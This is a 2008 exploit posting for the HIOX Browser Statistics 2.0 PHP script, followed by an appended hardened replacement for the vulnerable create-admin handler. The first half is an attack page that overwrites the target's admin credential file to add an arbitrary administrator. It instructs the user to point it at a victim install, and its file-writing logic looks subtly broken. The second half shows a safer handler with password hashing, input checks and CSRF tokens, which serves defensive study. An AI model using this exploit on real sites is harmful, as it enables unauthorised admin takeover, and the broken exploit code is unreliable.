HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit
Source: www.vfcocus.net  Author: Stack  Published: 2008-07-31
<?php
@session_start();
?>
<table align=center width=72% height=95% ><tr><td>
<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability 
[~] Discovered & exploited by Stack
[~] Greetz All Friends
[~] Special thanks to Str0ke
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ to the link of the script; it's very important
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
    $usname = $_POST['usernam'];
    $passwrd = md5($_POST['pword']);
    if($usname != "" && $passwrd != ""){
$filee = "http://localhost/path/admin/passwo.php";
$file1 = file($filee);
        $file = fopen($filee,'w');
        fwrite($file, "<?php \n");
        fwrite($file, "$");
        fwrite($file, "user=\"$usname\";\n");
        fwrite($file, "$");
        fwrite($file, "pass=\"$passwrd\";");
        fwrite($file, "\n?>");
        fclose($file);
    $creat = "false";
    echo "<div align=center style='color: green;'><b>New User Created
  <meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">
  <br>Please Wait You will be Redirected to Login Page
   </div>";
    }
    else{
        echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";
    }
}
if($creat == "true"){
?>
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">
<tr width=400 height=20><td align=center bgcolor="000000"
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
Create New User </td></tr>
     <tr width=400 height=20><td>
        <form name=setf method=POST action=<?php echo $PHP_SELF;?>>
        <table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
        <tr><td>User Name</td><td><input class="ta" name="usernam"  type=text maxlength=20 >
                </td></tr>
        <tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>
        <input name="createe" type=hidden value="creatuser"></td></tr>
        <tr><td></td><td><input type=submit value="create"></td></tr>
        </table>
</form>
</td></tr></table>
<?php
}
}else{
echo "<div align=center style='color: red;'><b>User Already Exist</div>";
}
?>
</td></tr></table>
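A hardened counterpart to the create-user handler in the listing above, as an added example that is not HIOX code or the exploit author's: it reads the stored credentials from disk before allowing creation, allow-lists the username, writes the record with var_export() and replaces md5() with password_hash(). The `csrf` session token (issued by the form page), the 12-character minimum and the array file format are assumptions.

```php
<?php
// Added example (not HIOX code): hardened one-time admin setup handler.
// CRED_FILE, the csrf field and the length limits are illustrative assumptions.
declare(strict_types=1);

const CRED_FILE = __DIR__ . '/admin/passwo.php';

// Read stored credentials from disk instead of trusting ambient variables.
// Handles both the legacy format ($user/$pass assignments) and an array return.
function loadCreds(string $path): array
{
    $user = $pass = '';
    $ret = is_file($path) ? include $path : null; // legacy file sets $user/$pass here
    return is_array($ret) ? $ret : ['user' => (string)$user, 'pass' => (string)$pass];
}

// Returns 'created', 'exists', 'invalid' or 'error'.
function createAdmin(string $path, string $user, string $password): string
{
    if ((loadCreds($path)['user'] ?? '') !== '') {
        return 'exists'; // an admin is already configured: refuse to overwrite
    }
    // Allow-list the username so input cannot break out of the PHP string literal.
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $user) || strlen($password) < 12) {
        return 'invalid';
    }
    $record = ['user' => $user, 'pass' => password_hash($password, PASSWORD_DEFAULT)];
    // var_export() emits a correctly quoted literal; LOCK_EX locks the file while writing.
    $body = "<?php\nreturn " . var_export($record, true) . ";\n";
    return file_put_contents($path, $body, LOCK_EX) === false ? 'error' : 'created';
}

if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    session_start();
    // Reject cross-site posts: the form must echo the token stored in the session.
    $sent = (string)($_POST['csrf'] ?? '');
    if (!isset($_SESSION['csrf']) || !hash_equals((string)$_SESSION['csrf'], $sent)) {
        http_response_code(403);
        exit('Bad request token');
    }
    $result = createAdmin(CRED_FILE, (string)($_POST['usernam'] ?? ''), (string)($_POST['pword'] ?? ''));
    http_response_code($result === 'created' ? 200 : 400);
    echo htmlspecialchars($result, ENT_QUOTES, 'UTF-8');
}
```

Login code must then verify with password_verify() against the stored hash, and the setup script should be removed or denied at the web server once the first account exists.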

 